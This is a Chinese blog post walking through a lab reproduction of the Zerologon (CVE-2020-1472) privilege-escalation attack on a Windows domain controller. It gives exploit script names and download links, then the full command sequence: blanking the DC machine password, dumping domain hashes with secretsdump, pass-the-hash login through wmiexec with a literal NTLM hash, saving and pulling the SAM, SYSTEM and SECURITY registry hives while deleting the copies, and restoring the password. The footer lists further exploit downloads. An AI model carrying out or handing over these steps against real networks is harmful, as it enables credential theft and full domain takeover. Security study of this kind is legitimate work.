ms17010漏洞利用_CVE20201472域内提权漏洞

最新推荐文章于 2024-04-11 17:58:03 发布
最新推荐文章于 2024-04-11 17:58:03 发布
阅读量1.4k 收藏
点赞数
文章标签: ms17010漏洞利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35039018/article/details/113087853
版权

0x01 漏洞说明

CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Server 2008R 2至Windows Server 2019的多个版本系统,只要攻击者能访问到目标域控并且知道域控计算机名即可利用该漏洞.该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为windows,该漏洞的稳定利用方式为重置目标域控的密码, 然后利用城控凭证进行Dc sync获取域管权限后修复域控密码,之所以不直接使用坏控凭证远程执行命令,是因为城控账户是不可以登录的,但是域控具备Dc sync权限, 可以获取域内任意用户的凭证。

Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空

漏洞利用过程中会重置域控存储在域中(ntds.dit)的凭证,而域控存储在域中的凭证与本地的注册表/lsass中的凭证不一致时,会导致目标域控脱域,所以在重置完域控凭证后要尽快恢复。

0x02 利用过程

测试环境:

aeebb2472c49dd79e6a3572b5111a88c.png 
DC域控:
  域名:WIN-ENS2VR5TR3N.demo.com
  域:demo.com
  ip:192.168.77.128
  操作系统:Windows Server 2008
  
攻击机:
  在域内/不在域内
  ip:192.168.77.129(没要求,能访问到目标域控即可)
  操作系统:Windows 7

影响版本:

Windows Server 2008 R2 for x64-based Systems
Service Pack 1Windows Server 2008 R2 for x64-based
Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

利用工具:

漏洞利用要结合五个脚本配合使用

分别为:

zerologon_tester.py  #POC检测
cve-2020-1472-exploit.py  #用于将目标域控的密码置空
secretsdump.py  #用于获取域管hash
wmiexec.py  #利用远程执行命令方法离线获取保存在注册表中的域控凭证
reinstall_original_pw.py  #将dc密码恢复

下载地址:

https://github.com/mstxq17/cve-2020-1472
https://github.com/risksense/zerologon
安装:pip install -r requirements.txt
注意:在安装impacket时不要安装指定版本可能会报错,直接pip install impacket(这样安装的就是最新版本)

漏洞复现:

  1. 使用zerologon_tester.py来检测目标是否存在此漏洞

python3 zerologon_tester.py DC_主机名 DC_IPb8576eddf6a4b109faa1658485bd0f34.png

  1. 使用cve-2020-1472-exploit.py将机器账户重置

python3 cve-2020-1472-exploit.py DC_主机名 DC_ip1f38b982c9d5713c402c8825fd95a5fb.png

  1. dump域管密码hash

./secretsdump.py -no-pass ./WIN-ENS2VR5TR3N$@192.168.77.128
注意:secretsdump.py文件在C:/user/username/../programs/python3/scripts/目录下49939e434a2fc1a7110a859bf774b12b.png

  1. 使用wmiexec连接拿到域控制器中的本地管理员权限(域管)

(当然wmiexec.py也在scipts目录下)

wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:80b9a02fb232cc21564b6bba13210425 ./administrator@192.168.77.128

然后依次执行,拷贝本机中SAM数据库到本地

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del system.save
del sam.save
del security.save
fd3630c7c1d09977f3a5692675821406.png
  1. 提取出DC账号的密码(如你所见,除此之外还有hex类型的加密,只需要解密一下即可获取明文)

secretsdump.py -sam sam.save -system system.save -security security.save localed2ccf22ad47bd6145c0fb1f5ebf4a21.png

  1. 使用工具https://github.com/risksense/zerologon 将dc密码恢复

reinstall_original_pw.py owa 192.168.52.138 4e88bf41aeb42e46e5e5ac561e97151b

20e3509299fa489995c79177f9982da2.png可以看到信息完整恢复了。

August丶Starten丶Sin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2018-8120-exp.zip_C++_CVE-2018-8120_cve_漏洞利用
09-23
CVE-2018-8120-完整利用代码(适用于win7-win10任意系统)
MS17漏洞入侵
c006128的博客
10-11 90
3.登录kali系统,取得root的限4。配置kali系统的静态IP地址5. 重启网卡6. 重启电脑reboot7.查看kali系统的IP地址2. 配置win 7的静态IP地址3. 关闭防火墙4.开启远程服务5.卸载补丁,重启电脑。
CVE-2020-1472-ZeroLogon复现
qq_56426046的博客
11-15 928
Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置控密码的远 程接口也使用了该函数,导致可以将控中保存在AD中的管理员password设置为空。
抄个冷板凳---x86架构MS-17010漏洞的多重利用方法
最新发布
weixin_48421613的博客
04-11 970
此次共涉及5个不同版本的x86架构的主机复现永恒之蓝漏洞
【CVE-2020-1472漏洞
xhwfa的博客
03-15 3894
一、漏洞简介 2020年8月11号,微软修复了Netlogon特漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸控,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD控建立安全通道时,可利用漏洞将AD控的计算机账号密码置为空,从而控制控服务器。 二、漏洞环境搭建 控:windows server 2008 R2,IP:192.168.16
ZeroLogon (CVE-2020-1472) 漏洞利用
Captain_RB的博客
10-24 1万+
ZeroLogon (CVE-2020-1472) 是近几年Windows上曝出的高危漏洞,CVSS V3.0评分10.0,攻击者只需要定位控主机名及IP,并且可以访问控,就可以在无需任何凭据的情况下 (可在外) 拿到管理员的限。
环境姿势
懂进攻知防守
08-15 1155
Netlogon升2020年08月12日, 微软官方发布了 NetLogon 特漏洞 的风险通告。攻击者通过NetLogon(MSNRPC),建立与控间易受攻击的安全通道时,可利用漏洞获取管访问限。成功利用漏洞的攻击者。可以在该网络中的设备上运行经特殊设计的应用程序。......
CVE-2018-8120 Microsoft Windows漏洞 Exp_64
06-10
CVE-2018-8120 Microsoft Windows漏洞 Exp_32 该资源适用于64位windows操作系统
CVE-2018-8120 Microsoft Windows漏洞 Exp_32
06-10
CVE-2018-8120 Microsoft Windows漏洞 Exp_32 请注意该资源适用于32位操作系统
CVE-2014-4113-exp.zip_CVE-2014-4113_cve_cve-2014-4113
09-24
CVE-2014-4113漏洞利用代码,国外大牛将最初只能在win7上使用的代码扩展到了win8上可用。python开发~
内最新漏洞原理深⼊分析
06-20
2021年11⽉9⽇,微软发布11⽉份...⾄此,这个最新的漏洞才受到⼤家的⼴泛关注,该 漏洞被命名为saMAccountName spoofing漏洞。该漏洞允许攻击者在仅有⼀个普通账号的场 景下,利⽤该漏洞接管全,危害极⼤
永恒之蓝-MS17010 CVE-2017-0146
星虐
12-31 6655
永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010。该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。 ...
之CVE-2020-1472复现打
yy
03-18 4274
CVE-2020-1472 是⼀个 windows 控中严重的远程漏洞,攻击者通过 NetLogon,建⽴与控间易受攻击的安全通道时,可利⽤此漏洞获取管访问限(将控中保存在AD中的管理员password设置为空);其漏洞原理是发⽣在 RPC 认证过程的过程中,由于错误的使⽤了 AES-CFB8 加密所导致漏洞成因,该漏洞适⽤于 Win2008 后的所有版本 利用场景:获取了一个加入了的计算机限,在普通账号的情况下,将管密码置空,导出管hash,然后进行连接...
CVE-2020-1472 ZeroLogon漏洞分析利用
mingyqf的博客
02-24 1322
CVE-2020-1472 ZeroLogon漏洞分析利用 暗影安全团队 2021-01-26 14:27:56 102316 0x01漏洞简介 CVE-2020-1472是一个windows控中严重的远程漏洞,此漏洞是微软8月份发布安全公告披露的紧急漏洞,CVSS评分为10分。未经身份认证的攻击者可通过使用 Netlogon 远程协议(MS-NRPC)连接控制器来利用漏洞,成功利用漏洞的攻击者可获得管理员限。该漏洞由 Secura 公司的 Tom Tervoort 发现交并命名为 Z
利用ms17-010漏洞
MzHeader的博客
03-27 3905
一、打开kali和win7查看IP。 (1) Windows7作为靶机 IP:192.168.43.109 (2) Kali作为攻击机(最新版kaili) IP:192.168.43.49 二、打开kali进入终端输入nmap +IP查看靶机是否开启445端口。 三、在kali中输入 msfconsole(等待一会可能会有点慢) 四、进入后输人search ms17-010(搜素攻击模块) 五...
MS17-010漏洞
mylyylmy的博客
08-01 1万+
今天自己搭建了验证MS17-010漏洞的虚拟靶机(win7:10.112.109.4) 查看一下端口设置,发现打开了445端口并且关闭防火墙 用nmap扫描一下查找漏洞 445端口打开进入msfconsloe,查找相关的模块 第二个是扫描模块,第三个是漏洞利用模块 先用扫描模块看一下  use。。。,配置好选项后 运行 显示对于ms17-010脆弱,即我们可以开始利用,使用...
CVE-2020-1472
网络安全。
09-16 6090
0x1 工具 这里使用zerologon_tester(https://github.com/SecuraBV/CVE-2020-1472)工具验证漏洞是否存在,使用zerologon(https://github.com/risksense/zerologon)工具复现。 运行set_empty_pw.py脚本需要最新版的impacket(https://github.com/SecureAuthCorp/impacket/commit/64ce46580286b5ab15a4737bddf85201ce
MS17-010 EternalBlue 漏洞分析
热门推荐
weixin_43526443的博客
02-06 7万+
转自:圈子社区 原文地址:https://www.jianshu.com/u/58a5f9e596a7 作者:一个二进制安全菜鸡 猫头鹰安全团队-ZSD 目录 Part1 简介 Part2 漏洞信息 1 漏洞存在文件信息 2 漏洞利用关键模块信息: 3 漏洞介绍 Part3 静态分析 Part4 动态分析 Part5 利用详细 Part6 最后 Part7 参考 Part1 简介 永恒之蓝(Eternal Blue)是一种利用Windows系统的SMB协议漏...
CVE-2020-1472漏洞实战 深度剖析
Ms08067安全实验室
11-18 9037
本文作者:Faith(Ms08067实验室 内网安全攻防知识星球)0x00漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网漏洞,影响Windows Serv...
如何利用CVE-2021-39617漏洞给安卓
02-27
很抱歉,我不能回答如何利用漏洞来攻击系统或,因为这涉及到安全问题和非法活动。作为一个AI语言模型,我的使命是为人类供有益的信息和知识,并帮助他们更好地了解技术和其他相关领。因此,我鼓励所有用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值